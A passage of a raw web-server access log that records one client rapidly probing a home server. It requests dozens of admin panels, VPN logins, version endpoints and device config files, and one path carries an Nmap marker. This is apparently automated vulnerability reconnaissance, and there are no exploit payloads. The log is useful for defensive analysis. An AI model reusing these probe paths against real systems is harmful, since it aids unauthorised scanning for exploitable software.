6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:55 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/base.pl" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:55 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/language/en-GB/en-GB.xml" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:55 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/helpdesk/WebObjects/Helpdesk.woa" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:55 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/administrator/manifests/files/joomla.xml" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:55 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/health" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:55 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/versa/login" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:55 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/geoserver/web/wicket/bookmarkable/org.geoserver.web.AboutGeoServerPage" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:55 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/human.aspx?arg12=infotech" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:55 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/owa/" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:55 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/p/login/" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:55 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/login.html" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:55 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/user" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:55 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/localstart.jsa" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:55 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/portal/" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:55 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/assets/png/favicon-abe32304.png" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:56 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/dana-cached/hc/HostCheckerInstaller.osx" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:56 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/nmaplowercheck1768621486" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:56 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/dashboard/" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:56 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/indice.jsa" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:56 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/info.asp" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:56 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/cgi-bin/param.cgi?get_device_conf" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:56 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/language/en-GB/en-GB.xml" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:56 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/administrator/manifests/files/joomla.xml" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:56 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/fog/management/index.php?node=client&sub=logininfo" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:56 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/status" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:56 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/owa/" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:56 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/apps/zxtm/login.cgi" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:56 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/lms/db" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:56 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/evox/about" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:56 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/App_Themes/Default/Images/favicon.ico" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:56 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/admin.shtml" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/ext-js/app/common/zld_product_spec.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Jan/2026:03:44:57 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/versions" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/login/login.html" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/webui/index.html" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/r-seenet/index.php" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/api/vip/i18n/api/v2/translation/products/vRNIUI/versions/1" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/admin.pl" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/versa/login" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/portal/" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/p/login/" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/login.html" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/images/logo.gif" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/api/version" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/api/server/version" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/tos/index.php?user/login" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/api/version" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/cgi-mod/header_logo.cgi?size=big" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/start.jsa" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/c/login" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/login.aspx" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/officescan/console/cgi/cgiChkMasterPwd.exe" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/assets/img/favicon.ico" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/IPCamDesc.xml" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/cgi-bin/param.cgi?get_device_conf" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/cslu/v1/core/conf" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/api/v1.0/environment" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/info.asp" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:57 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/lms/db" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:58 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/allversions" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.234.162.31] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:03:44:58 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/login/login.html" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.234.162.31] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:03:44:58 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/config" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:58 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/images/logo.png" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Jan/2026:03:44:58 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/webui" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:58 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/themes/admin/default/build/assets/favicon-19fbef86.svg" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:58 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/admin/reports/updates" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:58 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/CHANGELOG.txt" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:58 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/pom.xml" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:58 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/versions" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:58 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/allversions" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:58 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/admin/reports/status" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:58 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/geoserver/" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:58 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/r-seenet/index.php" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:58 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/cluster/list.query" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:58 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/webportal.cgi" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:58 +0000] 200 - GET http 92-249-249-197.pool.digikabel.hu "/" [Client 172.234.162.31] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:58 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/kylin/" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:59 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/workplace/home.action" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:59 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/api/vip/i18n/api/v2/translation/products/vRNIUI/versions/1" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:59 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/api/v2/about" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:59 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/dashboard/favicon.ico" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:59 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/owa/" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:59 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/health" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:59 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/+CSCOE+/logon.html" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:59 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/cgi-bin/authLogin.cgi" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:59 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/WebApp/js/UI_String.js" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:59 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/dashboard/" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:59 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/owa/" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:59 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/centreon/api/latest/platform/versions" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:59 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/IPCamDesc.xml" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:59 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/kubepi/fav.png" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:59 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/geoserver/web/" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:59 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/officescan/console/cgi/cgiChkMasterPwd.exe" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:59 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/am_bin/amlogin" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:44:59 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/system/version/current" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:00 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 172.234.162.31] [Length 154] [Gzip -] "-" "-" +[17/Jan/2026:03:45:00 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/webui/index.html" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:00 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/api/v1/version" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:00 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/assets/png/favicon-abe32304.png" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[17/Jan/2026:03:45:00 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/app/ui/login.jsp" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:00 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/hx/api/about" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:00 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/api/v1.0/environment" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:00 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/i18n/component/JS" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:00 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/kylin/" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:00 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/pandora_console/" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:00 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/public/static/favicon.png" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:01 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/cslu/v1/core/conf" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:01 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/login/?next=/" [Client 172.234.162.31] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:01 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/config" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:01 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/CHANGELOG.txt" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:01 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/c/login" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:01 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/api/v1/check-version" [Client 172.234.162.31] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML" "-" +[17/Jan/2026:03:45:01 +0000] 400 - GET http 